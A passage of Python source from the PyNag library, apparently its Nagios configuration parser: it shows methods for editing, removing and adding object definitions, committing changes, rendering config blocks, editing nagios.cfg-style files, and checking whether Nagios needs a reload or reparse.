            # Scan the definition's lines for field_name and rewrite in place.
            change = None
            value = None
            i = 0
            for i in range(len(object_definition)):
                tmp = object_definition[i].split(None, 1)
                if len(tmp) == 0:
                    continue
                # Hack for timeperiods, they dont work like other objects
                elif item['meta']['object_type'] == 'timeperiod' and field_name not in ('alias', 'timeperiod_name'):
                    tmp = [object_definition[i]]
                    # we can't change timeperiod, so we fake a field rename
                    if new_value is not None:
                        new_field_name = new_value
                        new_value = None
                        value = ''
                elif len(tmp) == 1:
                    value = ''
                else:
                    value = tmp[1]
                k = tmp[0].strip()
                if k == field_name:
                    # Attribute was found, lets change this line
                    if new_field_name is None and new_value is None:
                        # We take it that we are supposed to remove this attribute
                        change = object_definition.pop(i)
                        break
                    elif new_field_name:
                        # Field name has changed
                        k = new_field_name
                    if new_value is not None:
                        # value has changed
                        value = new_value
                        # Here we do the actual change
                    change = "\t%-30s%s\n" % (k, value)
                    if item['meta']['object_type'] == 'timeperiod' and field_name not in ('alias', 'timeperiod_name'):
                        change = "\t%s\n" % new_field_name
                    object_definition[i] = change
                    break
            if not change and new_value is not None:
                # Attribute was not found. Lets add it
                # (inserted at index i, i.e. just before the last line examined)
                change = "\t%-30s%s\n" % (field_name, new_value)
                object_definition.insert(i, change)
            # Lets put a banner in front of our item
        if make_comments:
            comment = '# Edited by PyNag on %s\n' % time.ctime()
            if len(everything_before) > 0:
                # Replace any stale banner from a previous edit.
                last_line_before = everything_before[-1]
                if last_line_before.startswith('# Edited by PyNag on'):
                    everything_before.pop()  # remove this line
            object_definition.insert(0, comment)
            # Here we overwrite the config-file, hoping not to ruin anything
        str_buffer = "%s%s%s" % (''.join(everything_before), ''.join(object_definition), ''.join(everything_after))
        self.write(filename, str_buffer)
        return True

    def open(self, filename, *args, **kwargs):
        """ Wrapper around the builtin open().

        All arguments are forwarded unchanged; having file access go through
        this method lets subclasses and tests override how files are opened.
        """
        file_handle = open(filename, *args, **kwargs)
        return file_handle

    @pynag.Utils.synchronized(pynag.Utils.rlock)
    def write(self, filename, string):
        """ Write *string* to *filename*, replacing any previous content.

        The file is opened in `'w'` mode and is always closed afterwards,
        even if the write fails. On success the parser is flagged dirty so
        callers know the on-disk configuration changed.

        Args:

            filename: File where *string* will be written. This is the path to
            the file. (string)

            string: String to be written to file. (string)

        Returns:

            The return value of the file object's write() call.

        """
        fh = self.open(filename, 'w')
        try:
            return_code = fh.write(string)
            fh.flush()
            # os.fsync(fh)
        finally:
            # Previously the handle leaked if write()/flush() raised.
            fh.close()
        self._is_dirty = True
        return return_code

    def item_rewrite(self, item, str_new_item):
        """ Completely rewrites item with string provided.

        Args:

            item: Item that is to be rewritten

            str_new_item: str representation of the new item

        ..
            In the following line, every "\\n" is actually a simple line break
            This is only a little patch for the generated documentation.

        Examples::
            item_rewrite( item, "define service {\\n name example-service \\n register 0 \\n }\\n" )

        Returns:

            True on success

        Raises:

            :py:class:`ValueError` if object is not found

            :py:class:`IOError` if save fails
        """
        # Delegate to the generic object modifier with a full replacement.
        return self._modify_object(item=item, new_item=str_new_item)

    def item_remove(self, item):
        """ Delete one specific item from its configuration files

        Args:

            item: Item that is to be removed

        Examples::
            item_remove( item )

        Returns:

            True on success

        Raises:

            :py:class:`ValueError` if object is not found

            :py:class:`IOError` if save fails
        """
        # Replacing the object with an empty string removes its definition.
        return self._modify_object(item=item, new_item="")

    def item_edit_field(self, item, field_name, new_value):
        """ Modifies one field of a (currently existing) object.

        Changes are immediate (i.e. there is no commit)

        Args:

            item: Item to be modified. Its field `field_name` will be set to
            `new_value`.

            field_name: Name of the field that will be modified. (str)

            new_value: Value to which will be set the field `field_name`. (str)

        Example usage::
            edit_object( item, field_name="host_name", new_value="examplehost.example.com") # doctest: +SKIP

        Returns:
            True on success

        Raises:

            :py:class:`ValueError` if object is not found

            :py:class:`IOError` if save fails
        """
        # Delegate to the generic object modifier.
        return self._modify_object(item=item, field_name=field_name, new_value=new_value)

    def item_remove_field(self, item, field_name):
        """ Removes one field of a (currently existing) object.

        Changes are immediate (i.e. there is no commit)

        Args:

            item: Item to remove field from.

            field_name: Field to remove. (string)

        Example usage::
            item_remove_field( item, field_name="contactgroups" )

        Returns:
            True on success

        Raises:

            :py:class:`ValueError` if object is not found

            :py:class:`IOError` if save fails
        """
        # With neither new_value nor new_field_name set (their defaults),
        # _modify_object removes the attribute entirely.
        return self._modify_object(item=item, field_name=field_name)

    def item_rename_field(self, item, old_field_name, new_field_name):
        """ Give one field of an existing item a new name.

        The change is applied immediately (there is no commit step).

        Args:

            item: Item to modify.

            old_field_name: Current name of the field. (string)

            new_field_name: Name that `old_field_name` will be renamed to. (string)

        Example usage::
            item_rename_field(item, old_field_name="normal_check_interval", new_field_name="check_interval")

        Returns:
            True on success

        Raises:

            :py:class:`ValueError` if object is not found

            :py:class:`IOError` if save fails
        """
        return self._modify_object(item=item, field_name=old_field_name, new_field_name=new_field_name)

    def item_add(self, item, filename):
        """ Adds a new object to a specified config file.

        The object's meta information is updated to point at `filename`, the
        parent directory is created if needed, and the serialized object is
        appended to the file.

        Args:

            item: Item to be created

            filename: Filename that we are supposed to write the new item to.
            This is the path to the file. (string)

        Returns:

            True on success

        Raises:

            :py:class:`IOError` on failed save
        """
        if 'meta' not in item:
            item['meta'] = {}
        item['meta']['filename'] = filename

        # Create directory if it does not already exist
        dirname = os.path.dirname(filename)
        if not self.isdir(dirname):
            os.makedirs(dirname)

        str_buffer = self.print_conf(item)
        # try/finally guarantees the handle is closed even if write() raises
        # (the previous version leaked the handle on a failed write)
        fh = self.open(filename, 'a')
        try:
            fh.write(str_buffer)
        finally:
            fh.close()
        return True

    def edit_object(self, item, field_name, new_value):
        """ Modify one field of a (currently existing) item.

        Changes take effect immediately (there is no commit step).

        Args:

            item: Item to modify.

            field_name: Field that will be updated.

            new_value: Updated value of field `field_name`

        Example Usage:
            edit_object( item, field_name="host_name", new_value="examplehost.example.com")

        Returns:
            True on success

        .. WARNING::

            THIS FUNCTION IS DEPRECATED. USE item_edit_field() instead
        """
        return self.item_edit_field(item=item, field_name=field_name, new_value=new_value)

    def compareObjects(self, item1, item2):
        """ Compares two items. Returns true if they are equal

        Both items must define the same set of attributes, and every attribute
        (except 'meta') must compare equal as a string. As a special case
        'check_interval' is compared numerically, so e.g. "30" equals "30.000".

        Args:
            item1, item2: Items to be compared.

        Returns:

            True -- Items are equal

            False -- Items are not equal
        """
        # sorted() works on both py2 lists and py3 dict views, unlike the
        # old keys() + list.sort() combination which breaks on python 3.
        keys1 = sorted(item1['meta']['defined_attributes'].keys())
        keys2 = sorted(item2['meta']['defined_attributes'].keys())
        if keys1 != keys2:
            return False
        for key in keys1:
            if key == 'meta':
                continue
            value1 = item1[key]
            value2 = item2[key]
            # For our purpose, 30 is equal to 30.000
            if key == 'check_interval':
                value1 = int(float(value1))
                value2 = int(float(value2))
            if str(value1) != str(value2):
                return False
        return True

    def edit_service(self, target_host, service_description, field_name, new_value):
        """ Edit a service's attributes

        Looks the service up by its (host, service_description) pair and
        sets its field `field_name` to `new_value`.

        Args:

            target_host: name of the host to which the service is attached to. (string)

            service_description: Service description of the service to modify. (string)

            field_name: Field to modify. (string)

            new_value: Value to which the `field_name` field will be updated (string)

        Returns:

            True on success

        Raises:

            :py:class:`ParserError` if the service is not found
        """
        service = self.get_service(target_host, service_description)
        if service is None:
            raise ParserError("Service not found")
        return self.edit_object(service, field_name, new_value)

    def _get_list(self, item, key):
        """ Return a comma list from an item

        Args:

            item: Item from which to select value. (string)

            key: Field name of the value to select and return as a list. (string)

        Example::

            _get_list(Foo_object, host_name)

            define service {
                service_description Foo
                host_name            larry,curly,moe
            }

            returns
            ['larry','curly','moe']

        Returns:

            A list of the item's values of `key`

        Raises:

            :py:class:`ParserError` if item is not a dict
        """
        if not isinstance(item, dict):
            raise ParserError("%s is not a dictionary\n" % item)
            # return []
        if not key in item:
            return []

        return_list = []

        if item[key].find(",") != -1:
            for name in item[key].split(","):
                return_list.append(name)
        else:
            return_list.append(item[key])

        # Alphabetize
        return_list.sort()

        return return_list

    def delete_object(self, object_type, object_name, user_key=None):
        """ Delete one object from the configuration files.

        Args:

            object_type: Type of the object to delete from configuration files.

            object_name: Name of the object to delete from configuration files.

            user_key: user_key to pass to :py:meth:`get_object`

        Returns:

            True on success.

        """
        return self.item_remove(self.get_object(object_type=object_type, object_name=object_name, user_key=user_key))

    def delete_service(self, service_description, host_name):
        """ Delete one service from the configuration files.

        Args:

            service_description: service_description field value of the
            service to delete.

            host_name: host_name field value of the service to delete.

        Returns:

            True on success.

        """
        return self.item_remove(self.get_service(host_name, service_description))

    def delete_host(self, object_name, user_key=None):
        """ Delete one host from its configuration files.

        Args:

            object_name: object_name field value of the host to delete.

            user_key: user_key to pass to :py:meth:`get_object`

        Returns:

            True on success.

        """
        object_type = 'host'
        return self.delete_object(object_type, object_name, user_key=user_key)

    def delete_hostgroup(self, object_name, user_key=None):
        """ Delete one hostgroup from its configuration files.

        Args:

            object_name: object_name field value of the hostgroup to delete.

            user_key: user_key to pass to :py:meth:`get_object`

        Returns:

            True on success.

        """
        object_type = 'hostgroup'
        return self.delete_object(object_type, object_name, user_key=user_key)

    def get_object(self, object_type, object_name, user_key=None):
        """ Return a complete object dictionary

        Scans all parsed objects of `object_type` and returns the first one
        whose key attribute equals `object_name`.

        Args:

            object_type: Type of the object to look up (e.g. 'host'). (string)

            object_name: Value the object's key attribute must match. (string)

            user_key: User defined key attribute to match on instead of the
            default key for this object type. Default None. (string)

        Returns:

            The item found to match all the criterias.

            None if object is not found

        """
        object_key = self._get_key(object_type, user_key)
        for item in self.data['all_%s' % object_type]:
            # dict.get() defaults to None already; objects missing the key
            # attribute simply never match
            if item.get(object_key) == object_name:
                return item
        return None

    def get_host(self, object_name, user_key=None):
        """ Look up one host object by name.

        Args:

            object_name: Name of the host to look up.

            user_key: user_key to pass to :py:meth:`get_object`

        Returns:

            The matching item, or None if no host matches.

        """
        object_type = 'host'
        return self.get_object(object_type, object_name, user_key=user_key)

    def get_servicegroup(self, object_name, user_key=None):
        """ Look up one servicegroup object by name.

        Args:

            object_name: Name of the servicegroup to look up.

            user_key: user_key to pass to :py:meth:`get_object`

        Returns:

            The matching item, or None if no servicegroup matches.

        """
        object_type = 'servicegroup'
        return self.get_object(object_type, object_name, user_key=user_key)

    def get_contact(self, object_name, user_key=None):
        """ Look up one contact object by name.

        Args:

            object_name: Name of the contact to look up.

            user_key: user_key to pass to :py:meth:`get_object`

        Returns:

            The matching item, or None if no contact matches.

        """
        object_type = 'contact'
        return self.get_object(object_type, object_name, user_key=user_key)

    def get_contactgroup(self, object_name, user_key=None):
        """ Look up one contactgroup object by name.

        Args:

            object_name: Name of the contactgroup to look up.

            user_key: user_key to pass to :py:meth:`get_object`

        Returns:

            The matching item, or None if no contactgroup matches.

        """
        object_type = 'contactgroup'
        return self.get_object(object_type, object_name, user_key=user_key)

    def get_timeperiod(self, object_name, user_key=None):
        """ Look up one timeperiod object by name.

        Args:

            object_name: Name of the timeperiod to look up.

            user_key: user_key to pass to :py:meth:`get_object`

        Returns:

            The matching item, or None if no timeperiod matches.

        """
        object_type = 'timeperiod'
        return self.get_object(object_type, object_name, user_key=user_key)

    def get_command(self, object_name, user_key=None):
        """ Look up one command object by name.

        Args:

            object_name: Name of the command to look up.

            user_key: user_key to pass to :py:meth:`get_object`

        Returns:

            The matching item, or None if no command matches.

        """
        object_type = 'command'
        return self.get_object(object_type, object_name, user_key=user_key)

    def get_hostgroup(self, object_name, user_key=None):
        """ Look up one hostgroup object by name.

        Args:

            object_name: Name of the hostgroup to look up.

            user_key: user_key to pass to :py:meth:`get_object`

        Returns:

            The matching item, or None if no hostgroup matches.

        """
        object_type = 'hostgroup'
        return self.get_object(object_type, object_name, user_key=user_key)

    def get_servicedependency(self, object_name, user_key=None):
        """ Look up one servicedependency object by name.

        Args:

            object_name: Name of the servicedependency to look up.

            user_key: user_key to pass to :py:meth:`get_object`

        Returns:

            The matching item, or None if no servicedependency matches.

        """
        object_type = 'servicedependency'
        return self.get_object(object_type, object_name, user_key=user_key)

    def get_hostdependency(self, object_name, user_key=None):
        """ Look up one hostdependency object by name.

        Args:

            object_name: Name of the hostdependency to look up.

            user_key: user_key to pass to :py:meth:`get_object`

        Returns:

            The matching item, or None if no hostdependency matches.

        """
        object_type = 'hostdependency'
        return self.get_object(object_type, object_name, user_key=user_key)

    def get_service(self, target_host, service_description):
        """ Return the service attached to `target_host` with the given description.

        Args:

            target_host: host_name field of the service to be returned.

            service_description: service_description field of the service to
            be returned.

        Returns:

            The matching service item, or None if none matches.

        """
        for service in self.data['all_service']:
            if service.get('host_name') != target_host:
                continue
            if service.get('service_description') == service_description:
                return service
        return None

    def _append_use(self, source_item, name):
        """ Append attributes to source_item that are inherited via 'use' attribute'

        Recursively merges attributes from template objects (objects that
        carry a "name" attribute) into `source_item`, never overwriting
        attributes `source_item` already defines.

        Args:

            source_item: item (dict) to apply the inheritance upon

            name: obsolete (discovered automatically via source_item['use'].
            Here for compatibility.

        Returns:

            Source Item with appended attributes.

        Raises:

            :py:class:`ParserError` on recursion errors

        """
        # Remove the 'use' key so the merged result no longer references its
        # template.
        if "use" in source_item:
            del source_item['use']

        # NOTE(review): attributes are merged from EVERY object that has a
        # "name" attribute, not just the one matching `name` / the original
        # 'use' value -- confirm this is intentional before changing it.
        for possible_item in self.pre_object_list:
            if "name" in possible_item:
                # Start appending to the item
                for k, v in possible_item.iteritems():

                    try:
                        if k == 'use':
                            # Templates can themselves inherit via 'use';
                            # recurse to pull those attributes in as well.
                            source_item = self._append_use(source_item, v)
                    except Exception:
                        raise ParserError("Recursion error on %s %s" % (source_item, v))

                    # Only add the item if it doesn't already exist
                    if not k in source_item:
                        source_item[k] = v
        return source_item

    def _post_parse(self):
        """ Creates a few optimization tweaks and easy access lists in self.data

        Creates :py:attr:`config.item_apply_cache` and fills the all_object
        item lists in self.data.

        """
        self.item_list = None
        self.item_apply_cache = {}  # This is performance tweak used by _apply_template
        for raw_item in self.pre_object_list:
            # Performance tweak, make sure hashmap exists for this object_type
            object_type = raw_item['meta']['object_type']
            if not object_type in self.item_apply_cache:
                self.item_apply_cache[object_type] = {}
                # Tweak ends
            if "use" in raw_item:
                raw_item = self._apply_template(raw_item)
            self.post_object_list.append(raw_item)
            # Add the items to the class lists.
        for list_item in self.post_object_list:
            type_list_name = "all_%s" % list_item['meta']['object_type']
            if not type_list_name in self.data:
                self.data[type_list_name] = []

            self.data[type_list_name].append(list_item)

    def commit(self):
        """ Write any changes that have been made to their appropriate files.

        Walks every parsed object; each item flagged with
        ``meta['needs_commit']`` is rewritten to its config file together
        with any other (non-deleted) items sharing that file. Items flagged
        ``meta['delete_me']`` are simply left out of the rewritten file.
        """
        # Loops through ALL items
        for k in self.data.keys():
            for item in self[k]:

                # If the object needs committing, commit it!
                if item['meta']['needs_commit']:
                    # Create file contents as an empty string
                    file_contents = ""

                    # find any other items that may share this config file
                    extra_items = self._get_items_in_file(item['meta']['filename'])
                    if len(extra_items) > 0:
                        for commit_item in extra_items:
                            # Ignore items that are already set to be deleted
                            if commit_item['meta']['delete_me']:
                                continue
                                # Make sure we aren't adding this thing twice
                            if item != commit_item:
                                file_contents += self.print_conf(commit_item)

                    # This is the actual item that needs commiting
                    if not item['meta']['delete_me']:
                        file_contents += self.print_conf(item)

                    # Write the file
                    filename = item['meta']['filename']
                    self.write(filename, file_contents)

                    # Recreate the item entry without the commit flag.
                    # NOTE(review): self.data[k] is mutated (remove/append)
                    # while "for item in self[k]" is iterating; this is only
                    # safe if self[k] yields a copy -- confirm before
                    # refactoring.
                    self.data[k].remove(item)
                    item['meta']['needs_commit'] = None
                    self.data[k].append(item)

    def flag_all_commit(self):
        """ Flag every item in the configuration to be committed.

        This should probably only be used for debugging purposes.
        """
        for item_list in self.data.values():
            for item in item_list:
                item['meta']['needs_commit'] = True

    def print_conf(self, item):
        """ Return a string that can be used in a configuration file

        Emits a comment header (filename, edit timestamp, hostgroup/service
        meta info, template-inherited values) followed by the object's
        "define <type> { ... }" block. Attributes with a None value and
        attributes inherited from templates are not written into the block.

        Args:

            item: Item to be dumped as a string.

        Returns:

            String representation of item.
        """
        output = ""
        # Header, to go on all files
        output += "# Configuration file %s\n" % item['meta']['filename']
        output += "# Edited by PyNag on %s\n" % time.ctime()

        # Some hostgroup information
        if "hostgroup_list" in item['meta']:
            output += "# Hostgroups: %s\n" % ",".join(item['meta']['hostgroup_list'])

        # Some service information
        if "service_list" in item['meta']:
            output += "# Services: %s\n" % ",".join(item['meta']['service_list'])

        # Some service member information
        if "service_members" in item['meta']:
            output += "# Service Members: %s\n" % ",".join(item['meta']['service_members'])

        if len(item['meta']['template_fields']) != 0:
            output += "# Values from templates:\n"
        for k in item['meta']['template_fields']:
            output += "#\t %-30s %-30s\n" % (k, item[k])
        output += "\n"
        output += "define %s {\n" % item['meta']['object_type']
        # items() instead of the python-2-only iteritems() keeps this
        # working on both python 2 and 3; behavior is identical.
        for k, v in item.items():
            if v is None:
                # Skip entries with No value
                continue
            if k != 'meta':
                if k not in item['meta']['template_fields']:
                    output += "\t %-30s %-30s\n" % (k, v)

        output += "}\n\n"
        return output

    def _load_static_file(self, filename=None):
        """ Load a general config file (like nagios.cfg) that has key=value config file format. Ignore comments

        Arguments:

            filename: name of file to parse, if none nagios.cfg will be used

        Returns:

            a [ (key,value), (key,value) ] list
        """
        result = []
        if not filename:
            filename = self.cfg_file
        for line in self.open(filename).readlines():
            # Strip out new line characters
            line = line.strip()

            # Skip blank lines
            if line == "":
                continue

            # Skip comments
            if line[0] == "#" or line[0] == ';':
                continue
            tmp = line.split("=", 1)
            if len(tmp) < 2:
                continue
            key, value = tmp
            key = key.strip()
            value = value.strip()
            result.append((key, value))
        return result

    def _edit_static_file(self, attribute, new_value, filename=None, old_value=None, append=False):
        """ Modify a general config file (like nagios.cfg) that has a key=value config file format.

        Arguments:

            filename: Name of config file that will be edited (i.e. nagios.cfg).
            Defaults to self.cfg_file when None.

            attribute: name of attribute to edit (i.e. check_external_commands)

            new_value: new value for the said attribute (i.e. "1"). None deletes
            the line.

            old_value: Useful if multiple attributes exist (i.e. cfg_dir) and
            you want to replace a specific one.

            append: If true, do not overwrite current setting. Instead append
            this at the end. Use this with settings that are repeated like
            cfg_file.

        Returns:

            True if the file was changed and written, False if no change was
            needed (value already set as requested).

        Examples::

            _edit_static_file(filename='/etc/nagios/nagios.cfg', attribute='check_external_commands', new_value='1')
            _edit_static_file(filename='/etc/nagios/nagios.cfg', attribute='cfg_dir', new_value='/etc/nagios/okconfig', append=True)
        """
        if filename is None:
            filename = self.cfg_file
        # For some specific attributes, append should be implied
        if attribute in ('cfg_file', 'cfg_dir', 'broker_module'):
            append = True

        # If/when we make a change, new_line is what will be written
        new_line = '%s=%s\n' % (attribute, new_value)

        # new_value=None means line should be removed
        if new_value is None:
            new_line = ''

        write_buffer = self.open(filename).readlines()
        is_dirty = False  # dirty if we make any changes
        for i, line in enumerate(write_buffer):
            # Strip out new line characters
            line = line.strip()

            # Skip blank lines
            if line == "":
                continue

            # Skip comments
            if line[0] == "#" or line[0] == ';':
                continue
            key, value = line.split("=", 1)
            key = key.strip()
            value = value.strip()

            # If key does not match, we are not interested in this line
            if key != attribute:
                continue

            # The elif-chain below only ever runs for lines whose key equals
            # `attribute` (the mismatch case continues above).
            # If old_value was specified, and it matches, dont have to look any further
            elif value == old_value:
                write_buffer[i] = new_line
                is_dirty = True
                break
            # if current value is the same as new_value, no need to make changes
            elif value == new_value:
                return False
            # Special so cfg_dir matches despite double-slashes, etc
            elif attribute == 'cfg_dir' and new_value and os.path.normpath(value) == os.path.normpath(new_value):
                return False
            # We are not appending, and no old value was specified:
            elif append is False and not old_value:
                write_buffer[i] = new_line
                is_dirty = True
                break
        if is_dirty is False and new_value is not None:
            # If we get here, it means we read the whole file,
            # and we have not yet made any changes, So we assume
            # We should append to the file
            write_buffer.append(new_line)
            is_dirty = True
            # When we get down here, it is time to write changes to file
        if is_dirty is True:
            str_buffer = ''.join(write_buffer)
            self.write(filename, str_buffer)
            return True
        else:
            return False

    def needs_reload(self):
        """  Checks if the Nagios service needs a reload.

        Returns:

            True if Nagios service needs reload of cfg files

            False if reload not needed or Nagios is not running
        """
        # Make sure main config values are parsed and available
        if not self.maincfg_values:
            self.reset()
            self.parse_maincfg()
        new_timestamps = self.get_timestamps()
        object_cache_file = self.get_cfg_value('object_cache_file')

        # Nagios is not running (no pid) -> no reload needed
        if self._get_pid() is None:
            return False
        # No object cache configured, or the cache file is missing:
        # assume a reload is pending
        if not object_cache_file:
            return True
        if not self.isfile(object_cache_file):
            return True
        object_cache_timestamp = new_timestamps.get(object_cache_file, 0)
        # NOTE(review): dead branch -- a falsy object_cache_file already
        # returned True above, so it can never be None here. Confirm intent
        # before removing.
        if object_cache_file is None:
            return False
        # Reload is needed if any config file is newer than the object cache
        for k, v in new_timestamps.items():
            if not v or int(v) > object_cache_timestamp:
                return True
        return False

    def needs_reparse(self):
        """ Checks if the Nagios configuration needs to be reparsed.

        Returns:

            True if any Nagios configuration file has changed since last parse()

        """
        # Parse has never been run
        if self.data == {}:
            return True
        # A previous save operation forced a reparse
        if self._is_dirty is True:
            return True

        # Otherwise compare the current config timestamps against the ones
        # recorded at parse time
        new_timestamps = self.get_timestamps()
        if len(new_timestamps) != len(self.timestamps):
            return True
        return any(self.timestamps.get(k, None) != v
                   for k, v in new_timestamps.items())

    @pynag.Utils.synchronized(pynag.Utils.rlock)
    def parse_maincfg(self):
        """ Parses your main configuration (nagios.cfg) and stores it as key/value pairs in self.maincfg_values

        This function is mainly used by config.parse() which also parses your
        whole configuration set.

        Raises:

            :py:class:`ConfigFileNotFound` if self.cfg_file is not set

        """
        # Without a nagios.cfg path there is nothing we can parse.
        if self.cfg_file is None:
            raise ConfigFileNotFound('Could not find nagios.cfg')

        self.maincfg_values = self._load_static_file(self.cfg_file)

    @pynag.Utils.synchronized(pynag.Utils.rlock)
    def parse(self):
        """ Parse all objects in your nagios configuration

        This functions starts by loading up your nagios.cfg ( parse_maincfg() )
        then moving on to your object configuration files (as defined via
        cfg_file and cfg_dir) and your resource_file as well.

        Returns:

          None

        Raises:

          :py:class:`IOError` if unable to read any file due to permission
          problems
        """

        # Discard any state from a previous parse
        self.reset()

        self.parse_maincfg()

        self.cfg_files = self.get_cfg_files()

        # When parsing config, we will softly fail if permission denied
        # comes on resource files. If later someone tries to get them via
        # get_resource, we will fail hard
        try:
            self._resource_values = self.get_resources()
        except IOError:
            t, e = sys.exc_info()[:2]
            self.errors.append(str(e))

        self.timestamps = self.get_timestamps()

        # This loads every object definition from every cfg file
        for cfg_file in self.cfg_files:
            self._load_file(cfg_file)

        # Apply templates and build the all_* lists in self.data
        self._post_parse()

        self._is_dirty = False

    def get_resource(self, resource_name):
        """ Get a single resource value which can be located in any resource.cfg file

         Arguments:

            resource_name: Name as it appears in resource file (i.e. $USER1$)

        Returns:

            String value of the resource, or None if the resource is not
            defined in any resource file.

        Raises:

            Whatever :py:meth:`get_resources` raises if the resource files
            cannot be read.

        """
        # The old docstring claimed KeyError/ParserError were raised here;
        # the code has always returned None for a missing resource, so the
        # documentation now matches the behavior.
        resources = self.get_resources()
        for k, v in resources:
            if k == resource_name:
                return v
        return None

    def get_timestamps(self):
        """ Return a hash map of all nagios related files and their timestamps.

        Files that do not exist keep a value of None.
        """
        files = {self.cfg_file: None}
        for key, value in self.maincfg_values:
            if key in ('resource_file', 'lock_file', 'object_cache_file'):
                files[value] = None
        for cfg_file in self.get_cfg_files():
            files[cfg_file] = None
        # Fill in the modification time of every file that actually exists
        for path in files:
            if self.isfile(path):
                files[path] = self.stat(path).st_mtime
        return files

    def isfile(self, *args, **kwargs):
        """ Thin wrapper that delegates to :py:func:`os.path.isfile`. """
        return os.path.isfile(*args, **kwargs)

    def isdir(self, *args, **kwargs):
        """ Thin wrapper that delegates to :py:func:`os.path.isdir`. """
        return os.path.isdir(*args, **kwargs)

    def islink(self, *args, **kwargs):
        """ Thin wrapper that delegates to :py:func:`os.path.islink`. """
        return os.path.islink(*args, **kwargs)

    def readlink(self, *args, **kwargs):
        """ Wrapper around os.readlink

        The instance parameter was previously misnamed ``selfself``; it is
        ``self`` like in every other wrapper here (callers are unaffected
        since the first positional argument is unchanged).
        """
        return os.readlink(*args, **kwargs)

    def stat(self, *args, **kwargs):
        """ Thin wrapper that delegates to :py:func:`os.stat`. """
        return os.stat(*args, **kwargs)

    def remove(self, *args, **kwargs):
        """ Thin wrapper that delegates to :py:func:`os.remove`. """
        return os.remove(*args, **kwargs)

    def access(self, *args, **kwargs):
        """ Thin wrapper that delegates to :py:func:`os.access`. """
        return os.access(*args, **kwargs)

    def listdir(self, *args, **kwargs):
        """ Thin wrapper that delegates to :py:func:`os.listdir`. """
        return os.listdir(*args, **kwargs)

    def exists(self, *args, **kwargs):
        """ Thin wrapper that delegates to :py:func:`os.path.exists`. """
        return os.path.exists(*args, **kwargs)

    def get_resources(self):
        """Return a list of every private resource (key, value pair) declared via resource_file in nagios.cfg."""
        resources = []
        for key, value in self.maincfg_values:
            if key != 'resource_file':
                continue
            if self.isfile(value):
                resources += self._load_static_file(value)
        return resources

    def extended_parse(self):
        """ This parse is used after the initial parse() command is run.

        It is only needed if you want extended meta information about hosts
        or other objects: it fills in meta['hostgroup_list'] and
        meta['service_list'] for hosts and meta['service_members'] for
        services.
        """
        # Do the initial parsing
        self.parse()

        # First, cycle through the hosts, and append hostgroup information.
        # enumerate() keeps `index` in sync with the host actually being
        # inspected; the old manual counter was NOT incremented when a
        # "continue" fired, so meta data could be written to the wrong host.
        for index, host in enumerate(self.data['all_host']):
            if host.get("register", None) == "0":
                continue
            if not "host_name" in host:
                continue
            if not "hostgroup_list" in self.data['all_host'][index]['meta']:
                self.data['all_host'][index]['meta']['hostgroup_list'] = []

            # Append any hostgroups that are directly listed in the host definition
            if "hostgroups" in host:
                for hostgroup_name in self._get_list(host, 'hostgroups'):
                    if not "hostgroup_list" in self.data['all_host'][index]['meta']:
                        self.data['all_host'][index]['meta']['hostgroup_list'] = []
                    if hostgroup_name not in self.data['all_host'][index]['meta']['hostgroup_list']:
                        self.data['all_host'][index]['meta']['hostgroup_list'].append(hostgroup_name)

            # Append any services which reference this host
            service_list = []
            for service in self.data['all_service']:
                if service.get("register", None) == "0":
                    continue
                if not "service_description" in service:
                    continue
                if host['host_name'] in self._get_active_hosts(service):
                    service_list.append(service['service_description'])
            self.data['all_host'][index]['meta']['service_list'] = service_list

        # Loop through all hostgroups, appending them to their respective hosts
        for hostgroup in self.data['all_hostgroup']:
            for member in self._get_list(hostgroup, 'members'):
                # Same index-drift fix as above: enumerate instead of a
                # manual counter that "continue" could skip
                for index, host in enumerate(self.data['all_host']):
                    if not "host_name" in host:
                        continue

                    # Skip members that do not match
                    if host['host_name'] == member:

                        # Create the meta var if it doesn't exist
                        if not "hostgroup_list" in self.data['all_host'][index]['meta']:
                            self.data['all_host'][index]['meta']['hostgroup_list'] = []

                        if hostgroup['hostgroup_name'] not in self.data['all_host'][index]['meta']['hostgroup_list']:
                            self.data['all_host'][index]['meta']['hostgroup_list'].append(hostgroup['hostgroup_name'])

        # Expand service membership: record which hosts each service is
        # actively applied to
        for index, service in enumerate(self.data['all_service']):
            self.data['all_service'][index]['meta']['service_members'] = self._get_active_hosts(service)

    def _get_active_hosts(self, item):
        """ Given an object, return a list of active hosts.

        This will exclude hosts that are negated with a "!"

        Args:

            item: Item to obtain active hosts from.

        Returns:

            List of all the active hosts for `item`
        """
        # First, generate the negation list
        negate_hosts = []

        # Hostgroups
        if "hostgroup_name" in item:
            for hostgroup_name in self._get_list(item, 'hostgroup_name'):
                if hostgroup_name[0] == "!":
                    hostgroup_obj = self.get_hostgroup(hostgroup_name[1:])
                    negate_hosts.extend(self._get_list(hostgroup_obj, 'members'))

        # Host Names
        if "host_name" in item:
            for host_name in self._get_list(item, 'host_name'):
                if host_name[0] == "!":
                    negate_hosts.append(host_name[1:])

        # Now get hosts that are actually listed
        active_hosts = []

        # Hostgroups
        if "hostgroup_name" in item:
            for hostgroup_name in self._get_list(item, 'hostgroup_name'):
                if hostgroup_name[0] != "!":
                    active_hosts.extend(self._get_list(self.get_hostgroup(hostgroup_name), 'members'))

        # Host Names
        if "host_name" in item:
            for host_name in self._get_list(item, 'host_name'):
                if host_name[0] != "!":
                    active_hosts.append(host_name)

        # Combine the lists
        return_hosts = []
        for active_host in active_hosts:
            if active_host not in negate_hosts:
                return_hosts.append(active_host)

        return return_hosts

    def get_cfg_dirs(self):
        """ Parses the main config file for configuration directories

        Returns:

            List of all cfg directories used in this configuration

        Example::

            print(get_cfg_dirs())
            ['/etc/nagios/hosts','/etc/nagios/objects',...]

        """
        # Every "cfg_dir" directive in the main config names one directory
        return [value for directive, value in self.maincfg_values if directive == "cfg_dir"]

    def get_cfg_files(self):
        """ Return a list of all cfg files used in this configuration

        Filenames are normalised so that if nagios.cfg specifies relative
        filenames we will convert it to fully qualified filename before returning.

        Returns:

            List of all configurations files used in the configuration.

        Example:

            print(get_cfg_files())
            ['/etc/nagios/hosts/host1.cfg','/etc/nagios/hosts/host2.cfg',...]

        """
        cfg_files = []
        for config_object, config_value in self.maincfg_values:

            # Add cfg_file objects to cfg file list
            if config_object == "cfg_file":
                config_value = self.abspath(config_value)
                if self.isfile(config_value):
                    cfg_files.append(config_value)

            # Parse all files in a cfg directory
            if config_object == "cfg_dir":
                config_value = self.abspath(config_value)
                directories = [config_value]
                raw_file_list = []
                # Walk through every subdirectory (breadth-first) and add to our list
                while directories:
                    current_directory = directories.pop(0)
